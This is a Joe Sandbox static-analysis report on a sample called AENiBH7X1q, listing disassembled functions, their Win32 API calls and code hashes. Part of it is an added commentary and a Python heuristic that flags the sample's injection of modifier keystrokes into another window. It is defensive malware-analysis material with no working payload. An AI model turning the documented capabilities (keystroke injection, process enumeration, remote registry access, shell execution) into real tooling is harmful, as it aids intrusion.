• Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
Similarity
• API ID: ConnectRegistry_wcslen
• String ID:
• API String ID: 535477410-0
• Opcode ID: 37987dacba266e2f7d681c7555595b89ca1c624194ad33880a6965c3691367fb
• Instruction ID: 71109d01e6e71572d3d886d5d9f1e4ab699fb1be984f768d753da2f0a00da466
• Opcode Fuzzy Hash: 37987dacba266e2f7d681c7555595b89ca1c624194ad33880a6965c3691367fb
• Instruction Fuzzy Hash: BBA18EB1204300AFC710EF65C885B1BB7E4BF85704F14896EF685AB292D779E905CB9B
APIs
  • Part of subcall function 0040FFF0: _wcslen.LIBCMT ref: 0040FFF2
  • Part of subcall function 0040FFF0: _wcscpy.LIBCMT ref: 00410012
• _memset.LIBCMT ref: 004538C4
• GetMenuItemInfoW.USER32(?,?), ref: 004538EF
• _wcslen.LIBCMT ref: 00453960
• SetMenuItemInfoW.USER32(00000011,?,00000000,?), ref: 004539C4
• SetMenuDefaultItem.USER32(?,000000FF,00000000,?,?), ref: 004539E0
Strings
Memory Dump Source
• Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
Similarity
• API ID: ItemMenu$Info_wcslen$Default_memset_wcscpy
• String ID: 0
• API String ID: 3530711334-4108050209
• Opcode ID: 95001eb6d8d06d897afce0aca893f4b7651020868193ca3a80220c39ecb6f9c3
• Instruction ID: 97d09e0af2b4d046480d7fb626e7fa0667c22e7462995616ff61acde959b3bac
• Opcode Fuzzy Hash: 95001eb6d8d06d897afce0aca893f4b7651020868193ca3a80220c39ecb6f9c3
• Instruction Fuzzy Hash: 747118F15083015AD714DF65C881B6BB7E4EB98396F04491FFD8082292D7BCDA4CC7AA
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                • GetCurrentProcessId.KERNEL32(?), ref: 00473A00
                                                                                                                                                                                                                                                                                                                                                                                                                • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 00473A0E
                                                                                                                                                                                                                                                                                                                                                                                                                • GetProcessIoCounters.KERNEL32(00000000,?), ref: 00473A34
                                                                                                                                                                                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000,00000000,?,00000028), ref: 00473C01
                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: Process$CloseCountersCurrentHandleOpen
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: HH
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 3488606520-2761332787
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 12402d889b8d2545f97f81e579d11a3e1d05628ef8a47b4e2ac7d1c45517ac81
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 2161edc7e7eefe464b48455ffcea7dd3157e2cbe85e131cccd8837112284b0a3
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 12402d889b8d2545f97f81e579d11a3e1d05628ef8a47b4e2ac7d1c45517ac81
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3581BF71A043019FD320EF69C882B5BF7E4AF84744F108C2EF598AB392D675E945CB96
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 0044710F: DeleteObject.GDI32(00000000), ref: 00447151
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 0044710F: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,00000000,?,?,?), ref: 00447195
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 0044710F: SelectObject.GDI32(?,00000000), ref: 004471A2
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 0044710F: BeginPath.GDI32(?), ref: 004471B7
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 0044710F: SelectObject.GDI32(?,00000000), ref: 004471DC
                                                                                                                                                                                                                                                                                                                                                                                                                • Ellipse.GDI32(?,?,?,00000000), ref: 00447463
                                                                                                                                                                                                                                                                                                                                                                                                                • MoveToEx.GDI32(?,?,?,00000000), ref: 00447473
                                                                                                                                                                                                                                                                                                                                                                                                                • AngleArc.GDI32(?,?,?,?,?,?), ref: 004474B6
                                                                                                                                                                                                                                                                                                                                                                                                                • LineTo.GDI32(?,?), ref: 004474BF
                                                                                                                                                                                                                                                                                                                                                                                                                • CloseFigure.GDI32(?), ref: 004474C6
                                                                                                                                                                                                                                                                                                                                                                                                                • SetPixel.GDI32(?,?,?,?), ref: 004474D6
                                                                                                                                                                                                                                                                                                                                                                                                                • Rectangle.GDI32(?,?), ref: 004474F3
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: Object$Select$AngleBeginCloseCreateDeleteEllipseFigureLineMovePathPixelRectangle
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 4082120231-0
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 3e823f4574af11f26be8c20bd8771cfecf2a7ea1363ae8038588c787c8c49515
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: e2e17d079c8faeb919f1a119f9aa9df975eabc7d00289576b12f70c1741c819b
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3e823f4574af11f26be8c20bd8771cfecf2a7ea1363ae8038588c787c8c49515
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: BC713AB11083419FD300DF15C884E6BBBE9EFC9708F148A1EF99497351D778A906CBAA
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 0044710F: DeleteObject.GDI32(00000000), ref: 00447151
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 0044710F: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,00000000,?,?,?), ref: 00447195
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 0044710F: SelectObject.GDI32(?,00000000), ref: 004471A2
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 0044710F: BeginPath.GDI32(?), ref: 004471B7
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 0044710F: SelectObject.GDI32(?,00000000), ref: 004471DC
                                                                                                                                                                                                                                                                                                                                                                                                                • Ellipse.GDI32(?,?,?,00000000), ref: 00447463
• MoveToEx.GDI32(?,?,?,00000000), ref: 00447473
• AngleArc.GDI32(?,?,?,?,?,?), ref: 004474B6
• LineTo.GDI32(?,?), ref: 004474BF
• CloseFigure.GDI32(?), ref: 004474C6
• SetPixel.GDI32(?,?,?,?), ref: 004474D6
• Rectangle.GDI32(?,?), ref: 004474F3
Memory Dump Source
• Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
Similarity
• API ID: Object$Select$AngleBeginCloseCreateDeleteEllipseFigureLineMovePathPixelRectangle
• String ID:
• API String ID: 4082120231-0
• Opcode ID: bd92991fb0a59d5160a547c0af993f50d26037df712543aebae1afc8709768cb
• Instruction ID: 71053adf7dd607ae91079c2ca5de7ffea4483cc305881a9741cc2e8bc8d6f2cf
• Opcode Fuzzy Hash: bd92991fb0a59d5160a547c0af993f50d26037df712543aebae1afc8709768cb
• Instruction Fuzzy Hash: 55613BB51083419FD300DF55CC84E6BBBE9EBC9308F148A1EF99597351D738A906CB6A
APIs
Memory Dump Source
• Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
Similarity
• API ID: AngleCloseEllipseFigureLineMovePixelRectangle
• String ID:
• API String ID: 288456094-0
• Opcode ID: d308d32173f93e4cd5527eec6d709d72f3e0fef6f2bd509874fda6c33d0c9603
• Instruction ID: d3db7697bfba14f4a3ad6627a8a5faa1010559558ae5e3f89cc6b0bd66950af4
• Opcode Fuzzy Hash: d308d32173f93e4cd5527eec6d709d72f3e0fef6f2bd509874fda6c33d0c9603
• Instruction Fuzzy Hash: 90514BB51082419FD300DF15CC84E6BBBE9EFC9308F14891EF99497351D734A906CB6A
APIs
• GetParent.USER32(?), ref: 004449B0
• GetKeyboardState.USER32(?), ref: 004449C3
• SetKeyboardState.USER32(?), ref: 00444A0F
• PostMessageW.USER32(?,00000101,00000010,?), ref: 00444A3F
• PostMessageW.USER32(?,00000101,00000011,?), ref: 00444A60
• PostMessageW.USER32(?,00000101,00000012,?), ref: 00444AAC
• PostMessageW.USER32(?,00000101,0000005B,?), ref: 00444AD1
Memory Dump Source
• Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
Similarity
• API ID: MessagePost$KeyboardState$Parent
• String ID:
• API String ID: 87235514-0
• Opcode ID: d47ceab968b999e6d4944081d81f2373d9ea27f049f07d95c13b51a59d3cc885
• Instruction ID: 19c159416ad4887e81d4090d30fbb5c505c675cee05c330e2fd8e115592bd25d
• Opcode Fuzzy Hash: d47ceab968b999e6d4944081d81f2373d9ea27f049f07d95c13b51a59d3cc885
• Instruction Fuzzy Hash: B651C5A05487D139F7369234884ABA7BFD55F8A304F08CA4EF1E5156C3D2ECE984C769
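The function above reads the keyboard state with GetKeyboardState, rewrites it with SetKeyboardState, and then posts message 0x0101 (WM_KEYUP) with wParam 0x10 (VK_SHIFT), 0x11 (VK_CONTROL), 0x12 (VK_MENU, i.e. Alt) and 0x5B (VK_LWIN) to the window returned by GetParent; the next function does the same with 0x0100 (WM_KEYDOWN). In other words it synthesizes modifier-key input aimed at another window rather than reading the user's keys. The Python below is an added example, not part of the Joe Sandbox report or of the sample's code: it parses API lines in the report's own "Name.MODULE(args), ref: addr" format, decodes the message and virtual-key constants (documented Win32 values), and flags this read-rewrite-inject pattern. The function names and the two-call threshold are my own choices; the embedded input is the WM_KEYUP call list from this function.

```python
import re
from typing import Dict, List, Optional, Tuple

# Input copied verbatim from the report's APIs block for this function.
SAMPLE_APIS = """\
• GetParent.USER32(?), ref: 004449B0
• GetKeyboardState.USER32(?), ref: 004449C3
• SetKeyboardState.USER32(?), ref: 00444A0F
• PostMessageW.USER32(?,00000101,00000010,?), ref: 00444A3F
• PostMessageW.USER32(?,00000101,00000011,?), ref: 00444A60
• PostMessageW.USER32(?,00000101,00000012,?), ref: 00444AAC
• PostMessageW.USER32(?,00000101,0000005B,?), ref: 00444AD1
"""

# Documented Win32 constants (winuser.h).
WINDOW_MESSAGES = {0x0100: "WM_KEYDOWN", 0x0101: "WM_KEYUP",
                   0x0104: "WM_SYSKEYDOWN", 0x0105: "WM_SYSKEYUP"}
KEY_MESSAGES = set(WINDOW_MESSAGES.values())
VIRTUAL_KEYS = {0x10: "VK_SHIFT", 0x11: "VK_CONTROL", 0x12: "VK_MENU",
                0x5B: "VK_LWIN", 0x5C: "VK_RWIN"}
MODIFIER_VKS = set(VIRTUAL_KEYS)

# One report line: optional bullet, "Api.MODULE(arg,arg,...), ref: HEXADDR".
API_LINE = re.compile(
    r"^\s*•?\s*(?P<api>\w+)\.(?P<module>\w+)\((?P<args>[^)]*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)")


def parse_api_lines(text: str) -> List[Dict]:
    """Turn the report's API lines into dicts; '?' marks an unresolved argument."""
    calls = []
    for line in text.splitlines():
        m = API_LINE.match(line)
        if not m:
            continue  # headers such as "Memory Dump Source" are skipped
        args = [a.strip() for a in m.group("args").split(",")] if m.group("args") else []
        calls.append({"api": m.group("api"), "module": m.group("module"),
                      "args": args, "ref": int(m.group("ref"), 16)})
    return calls


def decode_post_message(call: Dict) -> Optional[Tuple[str, str]]:
    """For Post/SendMessage calls with resolved msg and wParam, return
    (message name, virtual-key name); unknown values are kept as hex."""
    if not call["api"].startswith(("PostMessage", "SendMessage")) or len(call["args"]) < 3:
        return None
    msg_s, wparam_s = call["args"][1], call["args"][2]
    if msg_s == "?" or wparam_s == "?":
        return None
    msg, wparam = int(msg_s, 16), int(wparam_s, 16)
    return (WINDOW_MESSAGES.get(msg, f"0x{msg:04X}"), VIRTUAL_KEYS.get(wparam, f"0x{wparam:02X}"))


def find_modifier_injection(text: str) -> Dict:
    """Flag a function that snapshots and rewrites the keyboard state and then
    posts key-down/up messages for modifier keys (my heuristic: both
    GetKeyboardState and SetKeyboardState present plus at least two such posts)."""
    calls = parse_api_lines(text)
    apis = {c["api"] for c in calls}
    posted = []
    for c in calls:
        decoded = decode_post_message(c)
        if decoded and decoded[0] in KEY_MESSAGES and int(c["args"][2], 16) in MODIFIER_VKS:
            posted.append((decoded[0], decoded[1], c["ref"]))
    match = {"GetKeyboardState", "SetKeyboardState"} <= apis and len(posted) >= 2
    return {"match": match, "posted": posted, "targets_parent": "GetParent" in apis}


if __name__ == "__main__":
    result = find_modifier_injection(SAMPLE_APIS)
    print("modifier-key injection:", result["match"], "to parent window:", result["targets_parent"])
    for msg, vk, ref in result["posted"]:
        print(f"  {ref:08X}: {msg} {vk}")
```

The same parser runs unchanged over the WM_KEYDOWN sibling function that follows; only the decoded message name differs. Treat the heuristic as a triage aid: GUI frameworks also post modifier messages when they simulate keystrokes, so the hit says what the code does, not by itself why.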
APIs
• GetParent.USER32(?), ref: 00444BA9
• GetKeyboardState.USER32(?), ref: 00444BBC
• SetKeyboardState.USER32(?), ref: 00444C08
• PostMessageW.USER32(?,00000100,00000010,?), ref: 00444C35
• PostMessageW.USER32(?,00000100,00000011,?), ref: 00444C53
• PostMessageW.USER32(?,00000100,00000012,?), ref: 00444C9C
• PostMessageW.USER32(?,00000100,0000005B,?), ref: 00444CBE
Memory Dump Source
• Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: MessagePost$KeyboardState$Parent
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 87235514-0
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: de9aba9e896a2e755c79cba499ec14fd455f1b60db9a9f79a8626ad1a28ad6a0
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 4493abccadab05ae7d00f733e1fa63583af0c494729619d74f1516a50adc8d80
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: de9aba9e896a2e755c79cba499ec14fd455f1b60db9a9f79a8626ad1a28ad6a0
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A951E4F05097D139F7369364884ABA7BFE46F8A304F088A4EF1D5065C2D2ACE984C769
Memory Dump Source
• Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 2552f041a71837ba3affbc4ec308d2b7aa0755a9e2dfe05148a880b05b5b76bf
• Instruction ID: b3b3da583a0ae8cfa3180eda0e634cae40a493ebdfd517dbec9d2fd4fbd82cb1
• Opcode Fuzzy Hash: 2552f041a71837ba3affbc4ec308d2b7aa0755a9e2dfe05148a880b05b5b76bf
• Instruction Fuzzy Hash: 1E513A315082909FE321CF14DC89FABBB64FB46320F18456FF895AB2D1D7649C06D7AA
APIs
  • Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71
• RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046AA77
Strings
Memory Dump Source
• Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
Similarity
• API ID: ConnectRegistry_wcslen
• String ID: HH
• API String ID: 535477410-2761332787
• Opcode ID: a31a44ff546351b1de52d8f34745bf25342c9426a619c9766caf2b0061db1f75
• Instruction ID: 7b41397762752e7dec08e47bcdb2cb2f58790b6f4670524580eb9da3090621e6
• Opcode Fuzzy Hash: a31a44ff546351b1de52d8f34745bf25342c9426a619c9766caf2b0061db1f75
• Instruction Fuzzy Hash: A2516D71208301AFD304EF65C981F5BB7A9BFC4704F40892EF685A7291D678E905CB6B
APIs
• _memset.LIBCMT ref: 00457C34
• _memset.LIBCMT ref: 00457CE8
• ShellExecuteExW.SHELL32(?), ref: 00457D34
  • Part of subcall function 0040FFF0: _wcslen.LIBCMT ref: 0040FFF2
  • Part of subcall function 0040FFF0: _wcscpy.LIBCMT ref: 00410012
• CloseHandle.KERNEL32(?), ref: 00457DDD
Strings
Memory Dump Source
• Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
Similarity
• API ID: _memset$CloseExecuteHandleShell_wcscpy_wcslen
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: <$@
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 1325244542-1426351568
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: bce0cc86945754dfb230170ecd4c21a915d6526e7c9b1e7fd723952314da78dd
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 09e461bdfc47c8bdd671eddb31188d347eda7c51057725e13e77015b5001baed
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: bce0cc86945754dfb230170ecd4c21a915d6526e7c9b1e7fd723952314da78dd
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: EA510FB55083009FC710EF61D985A5BB7E4AF84709F00492EFD44AB392DB39ED48CB9A
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                • CreateToolhelp32Snapshot.KERNEL32(?,?,?,?,?,?,?,?,?,00000002,00000000,00000014), ref: 0047379B
                                                                                                                                                                                                                                                                                                                                                                                                                • Process32FirstW.KERNEL32(00000000,?), ref: 004737A8
                                                                                                                                                                                                                                                                                                                                                                                                                • __wsplitpath.LIBCMT ref: 004737E1
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00413DB0: __wsplitpath_helper.LIBCMT ref: 00413DF2
                                                                                                                                                                                                                                                                                                                                                                                                                • _wcscat.LIBCMT ref: 004737F6
                                                                                                                                                                                                                                                                                                                                                                                                                • __wcsicoll.LIBCMT ref: 00473818
                                                                                                                                                                                                                                                                                                                                                                                                                • Process32NextW.KERNEL32(00000000,?), ref: 00473844
                                                                                                                                                                                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000,00000000,?,?), ref: 00473852
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wcsicoll__wsplitpath__wsplitpath_helper_wcscat
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 2547909840-0
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 1dcf289f501924a5df592eae16a0ec0030d5246948486ec38c60cdc62178aa5b
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 8efa427203ffd7a45d167e3a64f6abf3f3640219bb0751621114887cb14f0fc1
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1dcf289f501924a5df592eae16a0ec0030d5246948486ec38c60cdc62178aa5b
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4751BB71544304A7D720EF61CC86FDBB3E8AF84748F00492EF58957182E775E645C7AA
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001308,?,00000000), ref: 004552B7
                                                                                                                                                                                                                                                                                                                                                                                                                • ImageList_Remove.COMCTL32(?,?,?,?), ref: 004552EB
                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,0000133D,?,00000002), ref: 004553D3
                                                                                                                                                                                                                                                                                                                                                                                                                • DeleteObject.GDI32(?), ref: 0045564E
                                                                                                                                                                                                                                                                                                                                                                                                                • DeleteObject.GDI32(?), ref: 0045565C
                                                                                                                                                                                                                                                                                                                                                                                                                • DestroyIcon.USER32(?,?,?,?,?), ref: 0045566A
                                                                                                                                                                                                                                                                                                                                                                                                                • DestroyWindow.USER32(?,?,?,?,?), ref: 00455678
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
